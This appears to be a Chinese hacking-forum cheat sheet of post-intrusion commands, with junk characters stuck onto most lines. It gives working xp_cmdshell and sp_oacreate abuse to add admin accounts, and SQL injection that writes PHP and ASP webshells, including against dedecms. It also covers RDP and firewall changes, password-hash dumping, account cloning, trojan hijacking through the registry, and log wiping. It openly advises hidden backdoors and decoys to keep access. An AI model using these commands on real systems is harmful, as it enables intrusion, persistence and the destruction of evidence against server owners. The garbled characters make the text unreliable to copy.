9 ~- b R& e! A, {6 k* w1.net user administrator /passwordreq:no
+ @; q4 _8 {* s9 ~# v& O这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
7 w$ n, G: j8 n# h2.比较巧妙的建克隆号的步骤! c: r [& `8 O* C
先建一个user的用户
F2 F1 c+ U) @1 A- {( i然后导出注册表。然后在计算机管理里删掉1 A( D3 e. E- u7 L
在导入,在添加为管理员组
- h; x' \! [9 W% ^ V) x! M3.查radmin密码# z4 |+ b& g" K7 V E# h. W1 M
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg6 R0 t4 p: ]5 o2 V# r; h
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]( i- q$ u9 z! s6 A
建立一个"services.exe"的项5 D! i5 T8 Y5 X* h9 o- i/ s
再在其下面建立(字符串值); x& |1 R9 V$ J& \: ~
键值为mu ma的全路径: E- k; E+ K% l; C4 B' M- L
5.runas /user:guest cmd
; l- l$ h, \3 T5 p) {3 V测试用户权限!
) ~2 A: d0 L9 v3 u& r6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?9 _0 z9 y3 ~( T# t. L- X$ l# O
7.入侵后漏洞修补、痕迹清理,后门置放:8 L( o) S# m* U% Z9 Q+ ]
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门8 W1 @% m" m. j& `2 l
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c& P; T3 k' r4 {" P6 H+ L* t
. Z% y, W* ]* j# F5 j* {. l" f
for example( ^4 N9 T; C4 M/ p% Y) D
1 O2 _( _/ `' S; Y2 M, y8 J ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
" K8 L4 }0 v5 n. K$ |, B3 x) J8 ^" w* ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'$ O2 k8 }6 Q3 g& y# U- I
! q" O1 Y2 Q+ V+ |
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
7 P' ?2 {2 `! T) H$ a如果要启用的话就必须把他加到高级用户模式
# K. {; i6 N W! x8 |! `. Z可以直接在注入点那里直接注入% n6 q9 _* y8 T% M& d5 s
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
7 l8 W$ Y$ h7 ^7 M( A然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
6 Q+ L, ?8 {% B9 e或者
+ `, Y3 K* w& x: |sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
3 B% N4 B9 X6 y/ A来恢复cmdshell。, j8 \/ G. I3 G- D' q
- |) Z- D! ?: z/ T5 W分析器
; B* F! S, s t: WEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--7 E- D7 ^' w: ?' [4 {4 m) j
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")% M& J, }% Z$ T
10.xp_cmdshell新的恢复办法( P2 S# W" @# W3 Y, u
xp_cmdshell新的恢复办法
# r8 O1 L2 H+ z7 X+ h" M扩展储存过程被删除以后可以有很简单的办法恢复:
- S7 E% ~/ B9 f& @8 x, l删除
- b1 t' L1 T+ Ldrop procedure sp_addextendedproc- B* N% g% S& I W4 `
drop procedure sp_oacreate
; z* O; r5 U1 o+ r1 ~) S" M! h' Zexec sp_dropextendedproc 'xp_cmdshell'
+ U; l2 u% l) S7 Z3 j+ l6 Q( Q$ e* Q ?6 x$ p6 J
恢复
3 X& l; v/ I+ f; cdbcc addextendedproc ("sp_oacreate","odsole70.dll")% h1 b; n1 K/ [( b
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")7 ]6 m" Z2 F4 I; j6 O8 h) h; I
- n, h* k# e: ~( Z" a这样可以直接恢复,不用去管sp_addextendedproc是不是存在" M* } _ e( x, f$ n) Z
' h9 X$ C# s$ [9 b-----------------------------. w/ Q$ o9 C* i2 N% E
- T, X7 m7 ^0 E& {2 O* H5 m: P5 x
删除扩展存储过过程xp_cmdshell的语句:' v5 }; z0 V* O' |: A
exec sp_dropextendedproc 'xp_cmdshell'1 {8 j3 R) i: G( u; Z0 Q
$ D" e$ _% e( \
恢复cmdshell的sql语句* j- b1 }; I( H* }/ s
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
, x6 D" Q! \1 J7 M$ e* a7 F- k" ?. a: w4 O6 X8 g
( m/ f, N. W( o! K& X开启cmdshell的sql语句9 W5 c1 `( X' B( ]$ u
& I4 V* b- e! E1 u
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
. v/ @4 ~6 c* L$ v6 U% W3 t9 Z& Y9 K+ r, Y
判断存储扩展是否存在2 V$ q2 y- L0 ~1 t
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: l! v5 _& A" e& u% |" d, U% o返回结果为1就ok
2 m/ `4 Q { D( k
k7 `/ s6 Q/ O* q! a- R% o恢复xp_cmdshell
5 |4 g* q1 |5 S: P" W* \exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
2 P* S0 H0 q4 g' z返回结果为1就ok
4 v2 n9 `6 d* I9 ~
4 r; G7 J6 u% O6 F+ T, w# c& I否则上传xplog7.0.dll9 y5 r1 ]6 H7 U! |' z3 F! f
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'" u; J* n' X7 O3 o, U
4 H& z7 j8 B% I3 O" p堵上cmdshell的sql语句
3 r' X0 H0 ^) l- _1 fsp_dropextendedproc "xp_cmdshel
$ j+ g" x( F3 ?: L k# m6 B/ Z4 z-------------------------5 b& ~; E N8 t4 m4 l' P
清除3389的登录记录用一条系统自带的命令:7 O' P# I* {1 X8 `- c' Y5 r4 ?
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
4 d3 d: X4 M& n: W4 Z
2 J0 f0 F/ X) o5 o; M然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件( J$ l% t5 L7 }2 H) l0 G' X3 j! _- ]
在 mysql里查看当前用户的权限, U: Z; t7 ~: G( R- h- U# @% O
show grants for
% Y' P. ~, @, k' }, Y/ u
+ f L! D6 M2 Y7 R& m以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。8 V) U$ H( A; o) t9 Q9 k
" o; |: g: N' n+ C! O; J+ C0 M" f4 D
Create USER 'itpro'@'%' IDENTIFIED BY '123';
" z5 r' h! n& _; R# v; ]3 N" h* ]' [
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION! S6 k# z1 z1 X
8 i7 {+ s# e& w, b! YMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
$ h9 @1 t. }( ?! y& z2 _& c6 T# K4 r
0 |# U# G. d! U; g4 E1 `, a6 d& @MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;% A) k) h4 P- N1 z& _0 J! f
: t& t8 V$ P9 ^3 J* u3 L搞完事记得删除脚印哟。$ ]1 w+ R3 j' n1 K
# e) g6 x3 R& D& R+ {* U. E1 ADrop USER 'itpro'@'%';' t" f1 w9 c. X& k4 e+ ]
# h' n) W/ n1 ^+ r2 o) ?8 K
Drop DATABASE IF EXISTS `itpro` ;0 s$ h" D- V, ?& A' m' q' C
5 |3 _' N; E& a7 Y0 }
当前用户获取system权限
w# R' d2 Z7 t& Tsc Create SuperCMD binPath= "cmd /K start" type= own type= interact9 p# ^9 t- f; h' C/ p {
sc start SuperCMD7 Q# j4 s9 ~9 j* b, a
程序代码5 P- p x, Q( B p8 I
<SCRIPT LANGUAGE="VBScript">
; y7 j4 s: {& c3 O, ^set wsnetwork=CreateObject("WSCRIPT.NETWORK")" _. j8 e9 u1 f$ t2 o* y
os="WinNT://"&wsnetwork.ComputerName
+ K3 K ~7 ~4 s4 _Set ob=GetObject(os)
, p6 K) q' c% p4 R: @Set oe=GetObject(os&"/Administrators,group")# ~3 F6 B6 }5 o6 H
Set od=ob.Create("user","nosec")
" r! L; ^' o! p/ @2 }1 r3 cod.SetPassword "123456abc!@#"0 d" c# _. Q$ }
od.SetInfo/ F6 |+ H' O/ v9 E1 ?$ i
Set of=GetObject(os&"/nosec",user)* `" ` ]; q- S$ c7 ^ }
oe.add os&"/nosec"
; y' P7 F! a3 X0 j3 R</Script>1 R# N, i% \. u2 O( J0 w
<script language=javascript>window.close();</script>
! M8 _% W2 T. v2 n* o4 Y# ]7 K" F& q) ]' V# X( m
, b5 g. u* a6 }7 p" X
- e& \. J- D' S; C: o# i- w
0 H8 C/ S6 C2 J突破验证码限制入后台拿shell
0 s% v) t& ]# |) S' H$ z程序代码
' {9 L6 G) p" m4 K: [2 e% xREGEDIT4 9 u& M! G1 P0 O5 l+ p& X3 W+ o
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
" l$ ^7 `( W: f; i* Z" v8 p8 v0 B) n4 w"BlockXBM"=dword:00000000
}4 k+ w& `. r0 Q: _6 \
" G- v& |4 u M! `7 r) u4 x保存为code.reg,导入注册表,重器IE
! k/ P0 J9 |) C. @; M就可以了5 g) n7 `" ~/ I9 }" x
union写马' j' J5 J0 z7 v6 f- A. q
程序代码
$ X7 h- }: @& R3 w; O. Mwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
( j/ Y _, J* g/ T. X' C% b; z: j( d3 n
应用在dedecms注射漏洞上,无后台写马# g* _' q) n# Y, |
dedecms后台,无文件管理器,没有outfile权限的时候
* |1 K1 ~+ V7 _: g$ m6 Q在插件管理-病毒扫描里
. ^5 a ]' f* ?& z3 G5 x3 I写一句话进include/config_hand.php里# c2 D+ W6 w( H8 Z" \8 j
程序代码8 {# B* D1 ~6 p& V5 w
>';?><?php @eval($_POST[cmd]);?>
/ s9 R& @6 u: n4 b) ^& j+ |; l3 B% Y. v
& ^5 b, D/ p; c3 u( q
如上格式% J+ M0 l' n8 F, I+ p
. E; L) d+ ?% h% `! I$ R5 K3 O- coracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解1 j) }! Q* N T, ^: e; ?9 Y$ M5 G( O
程序代码; c" [, J+ Z* m) j% w) A
select username,password from dba_users;
+ {( e( `( X* o, F; G9 y
% a) P2 B1 `) F+ e9 T# n
, @6 D0 f4 B8 ^5 P6 A- dmysql远程连接用户
$ h2 ^8 H: m- u. B+ w: u程序代码
) X4 B1 p7 G G# Q5 Y' h8 q& ~& Y1 a! S. ]' {7 E n7 D/ I
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';5 Z' w/ D! V5 |8 }
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION' ~5 C2 @9 K1 w
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0+ {) o% ~+ P" j$ m7 m7 r
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 G7 a7 a9 R5 Q1 v# S9 c5 m. h5 ?0 R6 B- |+ A6 N
4 i5 O. ~+ Y# m2 v# f1 J, c0 i) {6 L- x( q' X5 @
- L) f8 s2 _$ vecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
5 C2 a% {+ A# I! U ^
5 R/ \7 K/ k$ i1.查询终端端口
) L9 P& U" [- v- E) d+ I
( n( T6 o- G* }/ Qxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber3 t; P I% c* d1 Z/ W4 E
: K6 e& D8 c$ A8 F' p: f! F通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"3 g) Y' e6 W, ?- y4 a2 [# g0 l9 \
type tsp.reg! L( z& B! X+ A5 `
) W% k! N7 _* k. }5 {# U/ c. V
2.开启XP&2003终端服务* _/ `3 y4 s9 F' [9 _& q
" T4 ]+ D5 @ `; \: K' q8 \. [% f( G K' w \, y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f. d- L: s! z. w9 ]4 t
- v3 ^# j8 K+ k3 m5 n
0 C2 p( U {7 M. A9 S# pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
6 O- L, ^! m; j; `% E+ h2 b7 h8 H+ {
3.更改终端端口为20008(0x4E28)
/ ]" B* Z, ~0 @' q' G; z P- l1 x2 I) T9 o8 a
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f" B2 b: }' r6 `* a1 v
: }8 d4 @" h, w0 t' u
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
- l+ U9 t# P7 ^# J, F M1 D$ \- A1 F$ i1 _5 P
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制6 x6 }1 V& N4 b4 i' n+ h5 M
6 c( p, i9 r- Y; L, h5 }8 ~% W
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f. F( ?' J7 W# k& \
1 }& r/ O, p. s( \% a2 q5 F
8 H7 t4 G, w9 n r5 u( K' {5.开启Win2000的终端,端口为3389(需重启)
, {) u! {# l( ~% ?0 o$ M0 Z1 n0 c+ s. J/ I+ U1 I* a
echo Windows Registry Editor Version 5.00 >2000.reg
1 V. b* J3 j# M* s# H* V3 R1 b! hecho. >>2000.reg: V0 {5 e9 m# {5 u- o* k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 5 }8 t7 z2 g0 {. @
echo "Enabled"="0" >>2000.reg
* F1 [$ k3 P+ }; B" I3 Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
6 _: w# B. d/ T& _ C1 [2 N1 aecho "ShutdownWithoutLogon"="0" >>2000.reg 0 x$ Q |# u1 t' Q7 \
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
g+ D6 t* w' G6 b) uecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 7 X8 H" v7 S7 t" P* d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
6 e: n8 [) S5 u; G+ q& `3 d$ lecho "TSEnabled"=dword:00000001 >>2000.reg ) ]. {1 k) \5 G' A# l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ' O) e- ?# t. r: x& k, R
echo "Start"=dword:00000002 >>2000.reg
/ h: e+ s O5 e5 Q# a0 hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 5 n& j7 Y% S1 ~- S% W" j6 R. I
echo "Start"=dword:00000002 >>2000.reg
5 T' F" u# ^3 ~; t& N8 oecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg , H! |) R2 j9 q
echo "Hotkey"="1" >>2000.reg
8 R- j1 v3 E1 K( G# ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
# l/ S1 I* L, j" G L( wecho "ortNumber"=dword:00000D3D >>2000.reg 7 |% J( @2 l3 L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
2 E- a0 c" |6 d4 S ^7 jecho "ortNumber"=dword:00000D3D >>2000.reg: `3 s$ ~/ P1 F2 j& N3 [1 R+ ^4 S
! A4 r& `' ~( {' u6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)9 ]: Y3 K- n- i/ c. n# i* i
5 W0 w+ N. | ~% L6 F# m+ d
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
. l; u" F& w/ D6 F+ v* [6 v% B(set inf=InstallHinfSection DefaultInstall)
2 z0 ?3 F6 K9 g% s# U- @) yecho signature=$chicago$ >> restart.inf6 H8 S* U f7 V- G
echo [defaultinstall] >> restart.inf3 t, Z, W b/ S. _8 U
rundll32 setupapi,%inf% 1 %temp%\restart.inf
6 }: O- M9 I' \: B* m {& s; J$ l. }9 |( k- S$ K' u
3 C: b. A# Z$ e' U4 c- S8 K% A3 e N7.禁用TCP/IP端口筛选 (需重启)
9 c; T; e* l9 Y: v/ X
! O% U' W$ w8 R) v$ GREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
: |4 M- ], ]! z+ @6 \% v) R2 b, R6 k6 u1 s" y
8.终端超出最大连接数时可用下面的命令来连接; `; B" P; p- d7 z/ g% S
0 o$ T7 L- r; c q
mstsc /v:ip:3389 /console* \/ j2 v" q7 r. l. l' Q- {
: r5 A' J' T5 R M" n
9.调整NTFS分区权限 g% L1 a! u( ?+ y' b, C% |
0 |) ^, k' M( E+ K9 pcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)7 Y+ ?/ U. ~) v: Q: c% d
, {/ w) K6 z3 q, d0 X; P) ]. ^. icacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
; `1 ?1 `, g: C7 b' W. W3 ~- w+ D1 l$ T! c8 U2 m& L+ N. z1 Z9 _: e
------------------------------------------------------- ~) p/ g+ N, R3 X" J. x
3389.vbs 6 d* v# d0 y" Y1 t% y
On Error Resume Next
# s0 V2 p' ^, e1 r! N6 ]const HKEY_LOCAL_MACHINE = &H80000002
1 N) x% w) G4 D# D! hstrComputer = ".") _7 M0 _; @+ I8 Y _, K
Set StdOut = WScript.StdOut
6 ]0 _3 o( G" Z" ?2 DSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
3 w& [' z3 R2 i7 M h" D! fstrComputer & "\root\default:StdRegProv")% `6 @ c6 d: I8 Y$ _5 L' ^
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"7 o( h D) T1 e% j; w- h) z
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' z- j: g6 ?! x- S' u' ?( cstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp") q6 u3 k' ~, I
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
6 P' I. c5 C% p# X6 lstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/ J3 C. O/ ^5 k
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"/ W* z+ T0 N$ ?& @* E d" K$ }
strValueName = "fDenyTSConnections"; o, l: u9 z3 T2 S% J' L R
dwValue = 09 G; M7 K P: d8 c% i* d) |
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue# L+ P1 ]: d( U/ T: X2 M1 y7 j* Z) f
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"1 R8 I0 O! |# f+ s* L
strValueName = "ortNumber"
]4 y6 |. k/ G3 L$ z6 ]8 H" ?7 ddwValue = 3389
$ x! C- v* J& A( a1 |. R( Poreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue& E! [) L) L& @
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"1 V t: Z: J% j& q6 a
strValueName = "ortNumber"
; Y x4 o4 e2 XdwValue = 3389
' H5 w2 u4 n; @* U% a0 F* Foreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue8 |7 U! G- Z1 w5 Y$ ]" |, h
Set R = CreateObject("WScript.Shell") * u) |& \+ g" h7 g
R.run("Shutdown.exe -f -r -t 0")
+ d' }$ \3 d, _' j8 ?1 s/ t7 m! t+ k9 b% n2 X5 S! h
删除awgina.dll的注册表键值
+ W/ }6 O u/ r! ^2 k p. b# g3 B程序代码- x! r! j# m0 c4 {
; n# ]4 G- U& [$ c' |
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f% i$ v& b6 S" C& \; M) y
. O* G/ U& X1 {* i7 O# _; \
! Z/ \& O6 |6 r8 V( p8 K ?& V; z) \- G* T9 r) g, V M
' W- i5 [0 |1 Z. U4 q; F9 `. J程序代码( ]! F( v. w' O+ f/ A
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
2 \5 n* u: h: H! a. _( h
) J. \9 X* N D) x设置为1,关闭LM Hash
9 l( M4 V: x( ^& Z) i2 t- r' ^6 K6 E! ~0 r; S* V+ M, N( b
数据库安全:入侵Oracle数据库常用操作命令
, v; N( _; _( F7 K4 K H+ b5 C最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
6 w6 B6 m, A/ F0 G- x7 s( Q1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。" l! [5 H1 T! ?( d
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
& s4 l/ i! d' `8 t. d; _ U' c3、SQL>connect / as sysdba ;(as sysoper)或6 r( N9 M2 @ ]) L7 _
connect internal/oracle AS SYSDBA ;(scott/tiger). |& Q0 Y P7 m, Y& ^
conn sys/change_on_install as sysdba;
3 W) a# L0 I+ F7 _& N4、SQL>startup; 启动数据库实例- k+ y) X8 `1 T5 k. S4 B
5、查看当前的所有数据库: select * from v$database;& N9 w* _ J) r1 p1 }: f6 Q1 w! B
select name from v$database;
3 _) b- _! A/ b6 |* w2 X% l6、desc v$databases; 查看数据库结构字段
* V3 }$ Y6 w9 p% Z3 u7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:, X& p. E! l2 M/ n* ?$ H
SQL>select * from V_$PWFILE_USERS;* S7 |' x" W& i
Show user;查看当前数据库连接用户
$ a- D- C% f5 i* U8、进入test数据库:database test;
5 e! X9 @" A% _5 {/ m9、查看所有的数据库实例:select * from v$instance;. V) k u. t# k3 q3 k7 N3 n8 H
如:ora9i& ~% |: _6 [3 m3 Q8 @5 g2 f) K
10、查看当前库的所有数据表: ]& @. O1 ~( _3 }, V5 ~; w
SQL> select TABLE_NAME from all_tables;* H) P7 I: T# T8 |7 _
select * from all_tables;
5 t! H/ p/ K: t) M5 w3 q) L: L2 h3 VSQL> select table_name from all_tables where table_name like '%u%';
' n( k9 \4 [/ m5 b- D* K& VTABLE_NAME; @! D) a) f1 b) L# l
------------------------------ R3 G& \$ @+ i: S9 A3 {
_default_auditing_options_( j. ]' c, h* A0 V' @0 @9 Z
11、查看表结构:desc all_tables;0 i8 y K* Q1 t8 q
12、显示CQI.T_BBS_XUSER的所有字段结构:
8 J2 G/ X% |: \5 e' N0 h/ I; @) pdesc CQI.T_BBS_XUSER;" a. ?7 q9 A2 d
13、获得CQI.T_BBS_XUSER表中的记录:2 |6 `7 f/ H& Z2 `; R& V0 i1 h
select * from CQI.T_BBS_XUSER;
) y& F- z! y# P; _14、增加数据库用户:(test11/test)
) k- @; @& [( N* P f# dcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;( ~4 s2 i& @& u+ u8 F% h" w: z
15、用户授权:
' s7 g: N* ~( K: e' vgrant connect,resource,dba to test11;9 p3 E2 ^$ Y0 e7 E
grant sysdba to test11; r; h/ e; O6 j+ N# k
commit;# y7 [- @. ]' e9 d* Y7 H* r6 x
16、更改数据库用户的密码:(将sys与system的密码改为test.); _' O: M& ?7 Y6 D6 K
alter user sys indentified by test;
* K& R' B+ k) |' z9 e3 Nalter user system indentified by test;: E) C. f/ e2 t% r0 Z8 Y
3 r$ J1 ?0 S6 q4 v: ?, T
applicationContext-util.xml
8 a9 G- M; p8 i. lapplicationContext.xml
, _/ O; k N5 E9 O' M& o+ G% f. e' ? jstruts-config.xml$ M8 t( V/ O8 S& u0 p$ U7 c% S
web.xml/ l6 W( Y; [0 x) F {4 f }
server.xml; U( m" t! q: ?( ]! x4 R9 C5 ^, D
tomcat-users.xml3 x* w/ z# R% L6 K6 S
hibernate.cfg.xml, @* A* T- P; t8 G% z: Y# B
database_pool_config.xml- S( e- u' P: o, b
5 {3 O. k* s, t* x/ S8 x: s# C* ]( a% P. k8 i X+ s+ r7 I5 C0 {
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置- M* Y Y* v1 K. {2 j) M
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
8 w& B/ F& e/ ^5 [8 F* t$ H, _, v\WEB-INF\struts-config.xml 文件目录结构
$ e9 ^7 N/ |2 w7 u5 V8 A" c
' B1 O! }, m! G0 H) P, \spring.properties 里边包含hibernate.cfg.xml的名称% N2 N0 o* f+ |, c
8 E' W! ]7 f, F9 d
# p+ |5 ~% W% z9 `4 t4 CC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
$ m# r. B' c7 j; f1 J% S8 c' z' u$ v
如果都找不到 那就看看class文件吧。。
3 }8 D" e- c* }" D/ `/ C3 j1 [8 s: {
测试1:
+ _1 |5 @& p% y" uSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
" F, q0 A$ q* w5 c, g, l- V% W6 i8 A: E
测试2:4 q4 \/ b* l' y! b f
( i$ X M1 |( ycreate table dirs(paths varchar(100),paths1 varchar(100), id int)
! h9 i& U( [3 n) ^' w# x/ g8 |# q( h6 l8 R
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--/ d* M2 U% `8 j' \
z$ F N( W) a7 q4 D& k) F
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1, B# n. N' Y+ g0 B
+ d: I2 U4 B) c/ d4 y) X! _
查看虚拟机中的共享文件:7 R8 I# Z1 x1 g" i$ n6 u" s2 P h4 x
在虚拟机中的cmd中执行
, b5 l+ N% W' W\\.host\Shared Folders
/ a2 b+ F4 O! _
/ L3 N; S/ w7 @& ?2 T# E2 D1 f O% _cmdshell下找终端的技巧
: @/ K% P% O: {9 z* _找终端: 2 D: {( e2 u, Y: S2 W
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
1 ]% v; F+ z8 Y. l0 Y' o# u V; f 而终端所对应的服务名为:TermService 5 n$ P, i7 D) Z) s) }
第二步:用netstat -ano命令,列出所有端口对应的PID值!
' h( V0 ~+ E" c) z, c# d3 u 找到PID值所对应的端口
" q6 m5 ]4 G+ E3 ~& c% H- v2 v2 i4 s! I, ^0 O
查询sql server 2005中的密码hash6 V# z1 D: Z! J8 c6 w+ [
SELECT password_hash FROM sys.sql_logins where name='sa'' d, P, c+ Q# q$ w+ b, V7 }
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
8 P8 d* U0 `" U% d. P) K6 ^ e, k+ laccess中导出shell! b! j8 }1 P! I( D. U2 {' d
5 f$ L* D: y: I& M9 g6 P) E% P
中文版本操作系统中针对mysql添加用户完整代码:
$ a5 R2 B% J- j1 O5 |. t" x1 S" C8 N; o
use test;% A' }" ?6 d6 }4 |( {
